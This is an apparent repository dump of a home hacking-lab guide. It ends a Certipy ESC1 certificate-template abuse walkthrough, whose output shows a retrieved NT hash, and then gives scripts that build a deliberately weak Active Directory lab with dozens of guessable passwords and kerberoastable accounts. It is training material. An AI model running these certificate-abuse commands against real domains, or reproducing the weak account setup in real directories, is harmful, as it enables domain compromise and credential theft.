Owner : HACKLAB.LOCAL\Administrator 906 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins 907 | HACKLAB.LOCAL\Enterprise Admins 908 | HACKLAB.LOCAL\Administrator 909 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins 910 | HACKLAB.LOCAL\Enterprise Admins 911 | HACKLAB.LOCAL\Administrator 912 | Write Property Principals : HACKLAB.LOCAL\Domain Admins 913 | HACKLAB.LOCAL\Enterprise Admins 914 | HACKLAB.LOCAL\Administrator 915 | [!] Vulnerabilities 916 | ESC1 : 'HACKLAB.LOCAL\\Domain Users' and 'HACKLAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication 917 | 918 | 919 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template Vuln_Cert -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug 920 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 921 | 922 | [+] Domain retrieved from CCache: HACKLAB.LOCAL 923 | [+] Username retrieved from CCache: g.white 924 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230' 925 | [+] Generating RSA key 926 | [*] Requesting certificate via RPC 927 | [+] Using Kerberos Cache: g.white.ccache 928 | [+] Using TGT from cache 929 | [+] Username retrieved from CCache: g.white 930 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 931 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local' 932 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 933 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert] 934 | [*] Successfully requested certificate 935 | [*] Request ID is 10 936 | [*] Got certificate with UPN 'da1@hacklab.local' 937 | [*] Certificate has no object SID 938 | [*] Saved certificate and private key to 'da1.pfx' 939 | 940 | 941 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx da1.pfx -dc-ip 192.168.68.230 942 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 943 | 944 | [*] Using principal: da1@hacklab.local 945 | [*] Trying to get TGT... 946 | [*] Got TGT 947 | [*] Saved credential cache to 'da1.ccache' 948 | [*] Trying to retrieve NT hash for 'da1' 949 | [*] Got hash for 'da1@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 950 | 951 | 952 | ``` 953 | 954 | 955 | 956 | 957 | 958 | 959 | 960 | 961 | 962 | 963 | 964 | 965 | 966 | -------------------------------------------------------------------------------- /Hack_Lab_Domain.md: -------------------------------------------------------------------------------- 1 | **Creating a hack lab domain** 2 | 3 | Tested on server 2008R2, server 2019 and Server 2022. 4 | 5 | For server 2008 - The following one line will convert a server 2008 R2 to a domain controller. Right click on CMD and run as administrator, then copy and paste the single line below in one go. (Clearly read it before but it will set up the domain called hacklab.local). 6 | 7 | ``` 8 | dcpromo /unattend /InstallDns:yes /dnsOnNetwork:yes /replicaOrNewDomain:domain /newDomain:forest /newDomainDnsName:hacklab.local /DomainNetbiosName:hacklab /databasePath:"c:\Windows\ntds" /logPath:"c:\Windows\ntdslogs" /sysvolpath:"c:\Windows\sysvol" /safeModeAdminPassword:Passw0rd! /forestLevel:2 /domainLevel:2 /rebootOnCompletion:yes 9 | ``` 10 | 11 | For server 2019 and onwards - A PS one-liner to convert your server 2019 into a lab DC. 12 | 13 | ``` 14 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force ; Install-WindowsFeature AD-Domain-Services ; Import-Module ADDSDeployment ; Install-ADDSForest -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2008R2" -DomainName "hacklab.local" -DomainNetbiosName "HACKLAB" -ForestMode "Win2008R2" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$true -SysvolPath "C:\Windows\SYSVOL" -Force:$true ; Add-WindowsFeature RSAT-AD-Tools ; Restart-Computer 15 | ``` 16 | 17 | Set up a static IP on server 2019 18 | 19 | ``` 20 | New-NetIPAddress –InterfaceAlias Ethernet0 –IPAddress ADD-Your-IP-Address-Here –PrefixLength 24 -DefaultGateway ADD-Your-DG-IP-Address-Here ; Set-DnsClientServerAddress -InterfaceAlias Ethernet0 -ServerAddresses ADD-Your-DNS-IP-Address-Here ; Restart-Computer 21 | ``` 22 | 23 | Build the fake AD lab 24 | 25 | After a reboot, right click on powershell and run as administrator, then copy the below sections and paste in. 26 | This will create OU, and assign users to the department names, each password which is very weak is the same, this is simply to create a lab domain for hacking, feel free to edit each password in the script as you require. It will also set up Service Principal Name (SPN) for some accounts, so you can kerberoast them. 27 | 28 | ``` 29 | # Add Departments organizational unit (OU) Add Head_Office OU with nested department OU and IT OU. 30 | 31 | dsadd ou ou=Departments,dc=hacklab,dc=local 32 | dsadd ou "ou=IT,ou=Departments,dc=hacklab,dc=local" 33 | dsadd ou "ou=Admins,ou=IT,ou=Departments,dc=hacklab,dc=local" 34 | dsadd ou "ou=Service_Accounts,ou=IT,ou=Departments,dc=hacklab,dc=local" 35 | dsadd ou "ou=Help_Desk,ou=IT,ou=Departments,dc=hacklab,dc=local" 36 | dsadd ou "ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 37 | dsadd ou "ou=HR,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 38 | dsadd ou "ou=Sales,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 39 | dsadd ou "ou=Accounts,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 40 | dsadd ou "ou=Research,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 41 | dsadd ou "ou=Reception,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 42 | dsadd ou "ou=Administration,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 43 | dsadd ou "ou=Senior_Management,ou=Head_Office,ou=Departments,dc=hacklab,dc=local" 44 | 45 | # Create a user groups OU 46 | 47 | dsadd ou ou=Groups,ou=Departments,dc=hacklab,dc=local 48 | 49 | # Create the following user groups to the group OU 50 | 51 | dsadd group cn=sales,ou=Groups,ou=Departments,dc=hacklab,dc=local 52 | dsadd group cn=administration,ou=Groups,ou=Departments,dc=hacklab,dc=local 53 | dsadd group cn=accounts,ou=Groups,ou=Departments,dc=hacklab,dc=local 54 | dsadd group cn=help_desk,ou=Groups,ou=Departments,dc=hacklab,dc=local 55 | dsadd group cn=support,ou=Groups,ou=Departments,dc=hacklab,dc=local 56 | dsadd group cn=RDP,ou=Groups,ou=Departments,dc=hacklab,dc=local 57 | 58 | # Create Lab Test accounts 59 | 60 | # Head_Office / Accounts 61 | 62 | dsadd user "cn=n.collins, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 63 | dsadd user "cn=o.davidson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 64 | dsadd user "cn=p.davies, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 65 | dsadd user "cn=q.dawson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 66 | dsadd user "cn=u.dixon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 67 | dsadd user "cn=r.edwards, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 68 | dsadd user "cn=s.elliot, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 69 | dsadd user "cn=t.evans, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 70 | dsadd user "cn=u.fisher, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 71 | dsadd user "cn=v.fletcher, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 72 | dsadd user "cn=w.ford, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 73 | dsadd user "cn=x.foster, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 74 | dsadd user "cn=y.fox, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 75 | dsadd user "cn=z.gibson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 76 | dsadd user "cn=a.graham, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 77 | dsadd user "cn=b.grant, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 78 | dsadd user "cn=c.gray, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 79 | dsadd user "cn=d.green, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes 80 | dsadd user "cn=b.smith, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dragon1 -mustchpwd no -pwdneverexpires yes 81 | dsadd user "cn=c.johnason, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Baseball1 -mustchpwd no -pwdneverexpires yes 82 | dsadd user "cn=d.thomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Abc1231 -mustchpwd no -pwdneverexpires yes 83 | dsadd user "cn=e.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Football1 -mustchpwd no -pwdneverexpires yes 84 | dsadd user "cn=f.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Monkey1 -mustchpwd no -pwdneverexpires yes 85 | dsadd user "cn=g.williams, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Letmein1 -mustchpwd no -pwdneverexpires yes 86 | dsadd user "cn=t.harris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Shadow1 -mustchpwd no -pwdneverexpires yes 87 | dsadd user "cn=i.jackson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qwertyuiop1 -mustchpwd no -pwdneverexpires yes 88 | dsadd user "cn=t.wilsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mustang1 -mustchpwd no -pwdneverexpires yes 89 | dsadd user "cn=k.mmoore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Michael1 -mustchpwd no -pwdneverexpires yes 90 | dsadd user "cn=l.martsinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Superman1 -mustchpwd no -pwdneverexpires yes 91 | dsadd user "cn=m.marjtinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckyou1 -mustchpwd no -pwdneverexpires yes 92 | dsadd user "cn=n.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qazwsx1 -mustchpwd no -pwdneverexpires yes 93 | dsadd user "cn=o.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Killer1 -mustchpwd no -pwdneverexpires yes 94 | dsadd user "cn=p.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Trustno11 -mustchpwd no -pwdneverexpires yes 95 | dsadd user "cn=q.lewis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jordan1 -mustchpwd no -pwdneverexpires yes 96 | dsadd user "cn=r.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jennifer1 -mustchpwd no -pwdneverexpires yes 97 | dsadd user "cn=s.sancshez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Zxcvbnm1 -mustchpwd no -pwdneverexpires yes 98 | dsadd user "cn=t.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Asdfgh1 -mustchpwd no -pwdneverexpires yes 99 | dsadd user "cn=u.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hunter1 -mustchpwd no -pwdneverexpires yes 100 | dsadd user "cn=v.hill, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Buster1 -mustchpwd no -pwdneverexpires yes 101 | dsadd user "cn=w.king, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Soccer1 -mustchpwd no -pwdneverexpires yes 102 | dsadd user "cn=x.rossi, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Harley1 -mustchpwd no -pwdneverexpires yes 103 | dsadd user "cn=y.darrdvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Andrew1 -mustchpwd no -pwdneverexpires yes 104 | dsadd user "cn=z.perez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tigger1 -mustchpwd no -pwdneverexpires yes 105 | dsadd user "cn=a.white, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Sunshine1 -mustchpwd no -pwdneverexpires yes 106 | dsadd user "cn=b.jackson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iloveyou1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Iloveyou1" 107 | dsadd user "cn=c.smith, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckme1 -mustchpwd no -pwdneverexpires yes 108 | dsadd user "cn=d.taylor, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Charlie1 -mustchpwd no -pwdneverexpires yes 109 | dsadd user "cn=e.martin, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Robert1 -mustchpwd no -pwdneverexpires yes 110 | dsadd user "cn=f.thoffmas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Thomas1 -mustchpwd no -pwdneverexpires yes 111 | dsadd user "cn=g.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hockey1 -mustchpwd no -pwdneverexpires yes 112 | dsadd user "cn=h.rodrgviguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ranger1 -mustchpwd no -pwdneverexpires yes 113 | dsadd user "cn=i.johncson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Daniel1 -mustchpwd no -pwdneverexpires yes 114 | dsadd user "cn=j.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Starwars1 -mustchpwd no -pwdneverexpires yes 115 | dsadd user "cn=k.jones, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Klaster1 -mustchpwd no -pwdneverexpires yes 116 | dsadd user "cn=l.davsris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd George1 -mustchpwd no -pwdneverexpires yes 117 | dsadd user "cn=m.andessrson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Computer1 -mustchpwd no -pwdneverexpires yes 118 | dsadd user "cn=y.johnfson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Michelle1 -mustchpwd no -pwdneverexpires yes 119 | dsadd user "cn=o.mooore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jessica1 -mustchpwd no -pwdneverexpires yes 120 | dsadd user "cn=p.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Pepper1 -mustchpwd no -pwdneverexpires yes 121 | dsadd user "cn=q.thomdas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Zxcvbn1 -mustchpwd no -pwdneverexpires yes 122 | dsadd user "cn=r.martianez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Freedom1 -mustchpwd no -pwdneverexpires yes 123 | dsadd user "cn=s.wiloson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passmeup1 -mustchpwd no -pwdneverexpires yes 124 | dsadd user "cn=t.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckoff1 -mustchpwd no -pwdneverexpires yes 125 | dsadd user "cn=u.marteinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Maggie1 -mustchpwd no -pwdneverexpires yes 126 | dsadd user "cn=v.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Aaaaaa1 -mustchpwd no -pwdneverexpires yes 127 | dsadd user "cn=w.moorre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ginger1 -mustchpwd no -pwdneverexpires yes 128 | dsadd user "cn=x.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Princess1 -mustchpwd no -pwdneverexpires yes 129 | dsadd user "cn=y.martsinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Joshua1 -mustchpwd no -pwdneverexpires yes 130 | dsadd user "cn=z.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cheese1 -mustchpwd no -pwdneverexpires yes 131 | dsadd user "cn=a.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Amanda1 -mustchpwd no -pwdneverexpires yes 132 | dsadd user "cn=b.rodriseguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Summer1 -mustchpwd no -pwdneverexpires yes 133 | dsadd user "cn=c.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Loveyou1 -mustchpwd no -pwdneverexpires yes 134 | dsadd user "cn=d.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ashley1 -mustchpwd no -pwdneverexpires yes 135 | dsadd user "cn=e.wilison, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nicole1 -mustchpwd no -pwdneverexpires yes 136 | dsadd user "cn=f.davrtsis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chelsea1 -mustchpwd no -pwdneverexpires yes 137 | dsadd user "cn=g.mooree, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Biteme1 -mustchpwd no -pwdneverexpires yes 138 | dsadd user "cn=h.thomddfas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Matthew1 -mustchpwd no -pwdneverexpires yes 139 | dsadd user "cn=z.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Access1 -mustchpwd no -pwdneverexpires yes 140 | dsadd user "cn=j.martainez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yankees1 -mustchpwd no -pwdneverexpires yes 141 | dsadd user "cn=k.rodrigfduez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dallas1 -mustchpwd no -pwdneverexpires yes 142 | dsadd user "cn=l.sanchdez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Austin1 -mustchpwd no -pwdneverexpires yes 143 | dsadd user "cn=m.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Thunder1 -mustchpwd no -pwdneverexpires yes 144 | dsadd user "cn=n.davdemis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Taylor1 -mustchpwd no -pwdneverexpires yes 145 | dsadd user "cn=o.wilwson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Matrix1 -mustchpwd no -pwdneverexpires yes 146 | dsadd user "cn=p.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd William1 -mustchpwd no -pwdneverexpires yes 147 | dsadd user "cn=q.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Corvette1 -mustchpwd no -pwdneverexpires yes 148 | dsadd user "cn=r.martiynez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Martin1 -mustchpwd no -pwdneverexpires yes 149 | dsadd user "cn=s.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Heather1 -mustchpwd no -pwdneverexpires yes 150 | dsadd user "cn=t.johnsron, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Secret1 -mustchpwd no -pwdneverexpires yes 151 | dsadd user "cn=u.rodrigkjuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fucker1 -mustchpwd no -pwdneverexpires yes 152 | dsadd user "cn=v.sancghez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Merlin1 -mustchpwd no -pwdneverexpires yes 153 | dsadd user "cn=w.wilsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Diamond1 -mustchpwd no -pwdneverexpires yes 154 | dsadd user "cn=x.davifis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gfhjkm1 -mustchpwd no -pwdneverexpires yes 155 | dsadd user "cn=y.moossre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hammer1 -mustchpwd no -pwdneverexpires yes 156 | dsadd user "cn=z.thomssas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Silver1 -mustchpwd no -pwdneverexpires yes 157 | dsadd user "cn=a.martinuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Anthony1 -mustchpwd no -pwdneverexpires yes 158 | dsadd user "cn=b.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Justin1 -mustchpwd no -pwdneverexpires yes 159 | dsadd user "cn=c.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bailey1 -mustchpwd no -pwdneverexpires yes 160 | dsadd user "cn=d.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Q1w2e3r4t51 -mustchpwd no -pwdneverexpires yes 161 | dsadd user "cn=e.jodhnson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Patrick1 -mustchpwd no -pwdneverexpires yes 162 | dsadd user "cn=f.sanwchez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Internet1 -mustchpwd no -pwdneverexpires yes 163 | dsadd user "cn=g.wilpson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Scooter1 -mustchpwd no -pwdneverexpires yes 164 | dsadd user "cn=h.davxris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Orange1 -mustchpwd no -pwdneverexpires yes 165 | dsadd user "cn=i.moofrre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Golfer1 -mustchpwd no -pwdneverexpires yes 166 | dsadd user "cn=j.massrtainez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cookie1 -mustchpwd no -pwdneverexpires yes 167 | dsadd user "cn=k.rodrijguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Richard1 -mustchpwd no -pwdneverexpires yes 168 | dsadd user "cn=l.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Samantha1 -mustchpwd no -pwdneverexpires yes 169 | dsadd user "cn=m.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdog1 -mustchpwd no -pwdneverexpires yes 170 | dsadd user "cn=n.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Guitar1 -mustchpwd no -pwdneverexpires yes 171 | dsadd user "cn=o.martiwnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jackson1 -mustchpwd no -pwdneverexpires yes 172 | dsadd user "cn=p.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Whatever1 -mustchpwd no -pwdneverexpires yes 173 | dsadd user "cn=q.wiloson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mickey1 -mustchpwd no -pwdneverexpires yes 174 | dsadd user "cn=r.davirws, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chicken1 -mustchpwd no -pwdneverexpires yes 175 | dsadd user "cn=s.moewore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Sparky1 -mustchpwd no -pwdneverexpires yes 176 | dsadd user "cn=t.thoweermas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Snoopy1 -mustchpwd no -pwdneverexpires yes 177 | dsadd user "cn=u.johnslon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Maverick1 -mustchpwd no -pwdneverexpires yes 178 | dsadd user "cn=v.martienez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Phoenix1 -mustchpwd no -pwdneverexpires yes 179 | dsadd user "cn=w.rodrisguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Camaro1 -mustchpwd no -pwdneverexpires yes 180 | dsadd user "cn=x.sanchgez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Peanut1 -mustchpwd no -pwdneverexpires yes 181 | dsadd user "cn=y.wilison, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Morgan1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Morgan1" 182 | dsadd user "cn=z.davsdis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Welcome1 -mustchpwd no -pwdneverexpires yes 183 | dsadd user "cn=a.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Falcon1 -mustchpwd no -pwdneverexpires yes 184 | dsadd user "cn=b.johndson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cowboy1 -mustchpwd no -pwdneverexpires yes 185 | dsadd user 